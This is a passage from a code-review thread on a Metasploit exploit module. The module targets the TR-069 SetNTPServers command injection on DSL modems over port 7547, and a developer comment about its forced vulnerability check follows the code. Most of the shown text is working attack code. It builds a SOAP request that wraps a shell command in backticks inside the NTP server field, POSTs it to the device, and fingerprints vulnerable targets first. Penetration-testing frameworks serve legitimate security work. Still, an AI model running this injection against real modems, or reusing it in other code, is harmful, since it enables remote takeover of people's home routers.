modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb

```diff
@@ -0,0 +1,129 @@
+          'wvu' ,  # Metasploit module
+          '0x27'   # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'EDB', '40740' ],
+          [ 'URL', 'https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/'],
+          [ 'URL', 'https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759']
+        ],
+      'DisclosureDate' => 'Nov 07 2016',
+      'Privileged'     => true,
+      'Targets' =>
+        [
+          [ 'MIPS Big Endian',
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSBE
+            }
+          ],
+          [ 'MIPS Little Endian',
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSLE
+            }
+          ],
+
+        ],
+      'DefaultTarget'    => 0
+      ))
+
+    register_options(
+      [
+        Opt::RPORT(7547), # TR-069 CWMP port for SOAP/XML commands
+      ], self.class)
+
+  end
+
+  def set_new_ntp_server(cmd)
+    template = "<?xml version=\"1.0\"?>"
+    template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
+    template << " <SOAP-ENV:Body>"
+    template << "  <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
+    template << "   <NewNTPServer1>`%s`</NewNTPServer1>" # Backticks, aw yeah
+    template << "   <NewNTPServer2></NewNTPServer2>"
+    template << "   <NewNTPServer3></NewNTPServer3>"
+    template << "   <NewNTPServer4></NewNTPServer4>"
+    template << "   <NewNTPServer5></NewNTPServer5>"
+    template << "  </u:SetNTPServers>"
+    template << " </SOAP-ENV:Body>"
+    template << "</SOAP-ENV:Envelope>"
+
+    template % cmd
+  end
+
+  def execute_command(cmd, opts)
+    uri = '/UD/act?1'
+    soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers"
+    injected_data = set_new_ntp_server(cmd)
+    begin
+      res = send_request_cgi({
+        'uri'    => uri,
+        'ctype' => "text/xml",
+        'method' => 'POST',
+        'headers' => {
+          'SOAPAction' => soapaction,
+          },
+        'data' => injected_data
+      }, 2)
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri' => '/globe' # TODO: Check this? Why not /UD/act?1
+      })
+    rescue ::Rex::ConnectionError
+      vprint_error("A connection error has occured")
+      return Exploit::CheckCode::Unknown
+    end
+
+    if res and res.code == 404 and res.body =~ /home_wan\.htm/
+      return Exploit::CheckCode::Appears
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status("Trying to access the device...")
+
+    unless check == Exploit::CheckCode::Appears
```

Comment:
yeah i kinda hate the forced check, makes debug a hassle. Is there already a mechanism to avoid this, or are you saying we need one @FireFart ?